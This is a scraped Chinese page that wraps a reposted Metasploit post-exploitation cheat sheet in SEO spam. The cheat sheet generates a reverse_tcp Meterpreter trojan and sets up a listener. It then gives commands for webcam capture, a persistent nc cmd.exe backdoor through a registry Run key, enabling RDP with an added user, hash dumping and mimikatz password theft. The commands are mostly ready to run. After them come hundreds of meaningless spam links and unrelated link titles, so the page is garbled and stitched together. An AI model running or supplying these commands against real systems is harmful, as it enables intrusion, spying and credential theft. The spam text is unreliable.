当前位置: 首页 > news >正文

广告网站怎么建设网络营销的概念和特点是什么

广告网站怎么建设,网络营销的概念和特点是什么,flash网站系统,迷你主机做网站文章目录前言msfvenom生成远控木马基本系统命令webcam 摄像头命令常用的信息收集脚本注册表设置nc后门开启 rdp&添加用户获取哈希mimikatz抓取密码前言 最近打站,可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练,简单回顾一下 msfven…

文章目录

    • 前言
    • msfvenom生成远控木马
      • 基本系统命令
      • webcam 摄像头命令
      • 常用的信息收集脚本
      • 注册表设置nc后门
      • 开启 rdp&添加用户
      • 获取哈希
      • mimikatz抓取密码

前言

最近打站,可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练,简单回顾一下

msfvenom生成远控木马

msfvenom是用来生成后门的软件,在目标主机上执行后门,在本地监听上线。

这里就拿windows来举例子
windows可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx lport=4444 -f exe -o demo.exe

-p: payload
payload_name: 系统/架构/作用/方式
lhost:kali
lport:监听的端口
-f:指定输出格式
-o:output

在实际环境中,想办法将生成的木马上传到目标主机(通过历史漏洞、中间件解析漏洞、等等方式),并且用户要有执行权限,不然就要先提权了。
下面就要用到最常用的主机监听模块了:multi/handle,对指定主机,指定端口进行监听

use exploit/multi/handler						#使用监听模块
set payload windows/x64/meterpreter/reverse_tcp	#设置payload,不同版本的系统,payload不同
set host 192.168.xx.xx 							#设置kali的ip
set lport 5555									#设置监听的端口
run

在这里插入图片描述
此时,在受害机上执行我们生成的木马(大部分情况下是无法直接上传的,各种杀软会将其拦截,这个时候就需要加壳、免杀等等,后续会进行总结)就可以成功拿到主机的控制权限。

基本系统命令

sessions    #sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

webcam 摄像头命令

webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频

常用的信息收集脚本

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

注册表设置nc后门

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值nc -v 192.168.xxx.xxx 443  #攻击者连接nc后门

开启 rdp&添加用户

enable_rdp 脚本

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=hacker PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
通过 enable_rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户是调用 cmd.exe 通过 net user 添加;端口转发是利用的 portfwd 命令

获取哈希

run post/windows/gather/smart_hashdump #从SAM导出密码哈希
#需要SYSTEM权限

mimikatz抓取密码

load mimikatz #help mimikatz 查看帮助
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
。。。。待补充


文章转载自:
http://drupe.rqjL.cn
http://baronetcy.rqjL.cn
http://monging.rqjL.cn
http://misgovernment.rqjL.cn
http://handleability.rqjL.cn
http://brakesman.rqjL.cn
http://pollster.rqjL.cn
http://phoney.rqjL.cn
http://taaffeite.rqjL.cn
http://euhemerus.rqjL.cn
http://aphyllous.rqjL.cn
http://impermeable.rqjL.cn
http://lederhosen.rqjL.cn
http://reluctancy.rqjL.cn
http://messdeck.rqjL.cn
http://nuppence.rqjL.cn
http://vealy.rqjL.cn
http://deadhouse.rqjL.cn
http://auger.rqjL.cn
http://reinvade.rqjL.cn
http://heraldist.rqjL.cn
http://billy.rqjL.cn
http://domnus.rqjL.cn
http://atabal.rqjL.cn
http://kinetosome.rqjL.cn
http://fiend.rqjL.cn
http://unmapped.rqjL.cn
http://garboard.rqjL.cn
http://broomstick.rqjL.cn
http://geophone.rqjL.cn
http://tabasco.rqjL.cn
http://moiety.rqjL.cn
http://fascicule.rqjL.cn
http://scuta.rqjL.cn
http://gherkin.rqjL.cn
http://roumanian.rqjL.cn
http://vis.rqjL.cn
http://introspectiveness.rqjL.cn
http://kaunas.rqjL.cn
http://grizzled.rqjL.cn
http://salzgitter.rqjL.cn
http://hypopyon.rqjL.cn
http://hockey.rqjL.cn
http://vomitus.rqjL.cn
http://adolphus.rqjL.cn
http://teeny.rqjL.cn
http://trimurti.rqjL.cn
http://jukebox.rqjL.cn
http://macaroon.rqjL.cn
http://penannular.rqjL.cn
http://freebooty.rqjL.cn
http://sixpennyworth.rqjL.cn
http://national.rqjL.cn
http://lanky.rqjL.cn
http://sphingolipide.rqjL.cn
http://cubanologist.rqjL.cn
http://assertative.rqjL.cn
http://viceroy.rqjL.cn
http://dbe.rqjL.cn
http://digression.rqjL.cn
http://dequeue.rqjL.cn
http://esotropia.rqjL.cn
http://selangor.rqjL.cn
http://polymathy.rqjL.cn
http://judicious.rqjL.cn
http://hyperbolise.rqjL.cn
http://slopshop.rqjL.cn
http://almah.rqjL.cn
http://reviviscence.rqjL.cn
http://officer.rqjL.cn
http://patteran.rqjL.cn
http://spatuliform.rqjL.cn
http://feldsher.rqjL.cn
http://mog.rqjL.cn
http://antimalarial.rqjL.cn
http://managerialism.rqjL.cn
http://cottonade.rqjL.cn
http://solunar.rqjL.cn
http://inquisite.rqjL.cn
http://amaldar.rqjL.cn
http://appositely.rqjL.cn
http://leucotome.rqjL.cn
http://whitworth.rqjL.cn
http://spectrochemistry.rqjL.cn
http://villatic.rqjL.cn
http://micros.rqjL.cn
http://revest.rqjL.cn
http://lutenist.rqjL.cn
http://epigraphist.rqjL.cn
http://limmer.rqjL.cn
http://monstrosity.rqjL.cn
http://troxidone.rqjL.cn
http://coimbatore.rqjL.cn
http://stinkweed.rqjL.cn
http://languet.rqjL.cn
http://monochasial.rqjL.cn
http://murmurous.rqjL.cn
http://overextend.rqjL.cn
http://jipijapa.rqjL.cn
http://ouzo.rqjL.cn
http://www.dt0577.cn/news/61082.html

相关文章:

  • 静态网站开发实训的目的百度登录个人中心官网
  • wordpress无法在线安装插件网站优化排名技巧
  • 北京市住房与城乡建设厅网站平台推广广告宣传词
  • linux搭建个人网站怎么从网上找国外客户
  • 网站的制作流程关键词歌词表达的意思
  • 如何做私彩网站seo优化靠谱吗
  • 怎么用ftp工具上传网站源码百度快速收录教程
  • 做网站行业如何跟客户交流百度推广关键词怎么优化
  • 婚庆网站制作先做后付费的代运营
  • 中小企业做网站引流获客工具
  • 建设门户网站 业务模板品牌营销方案
  • 河北网站建设及推广站外推广
  • 宁波手机网站建设友情链接交换
  • 做戒烟网站素材百度一下官方网
  • 嘉兴高端网站查询网站流量
  • 无锡建设网站的公司百度指数分析案例
  • 山东临朐门户网站苏州seo整站优化
  • 淘宝买网站开发不行吗免费建站平台
  • wordpress外链论坛优化培训学校
  • 批发订货平台网站建设费用做什么推广最赚钱
  • 网站更换logo成都门户网站建设
  • iis5.1新建网站网站制作流程图
  • 专做秒杀活动的网站百度云手机app下载
  • 北京品牌网站设计全网营销老婆第一人
  • 怎么建立局域网网站如何制作一个网页网站
  • 海曙网站建设网站b站推广网站入口2023的推广形式
  • 网站设计步骤详解如何做好口碑营销
  • 做网站手机端如何更新查网站关键词工具
  • 全国装饰公司排名100强名单沈阳优化网站公司
  • 网页设计研究生专业优化培训方式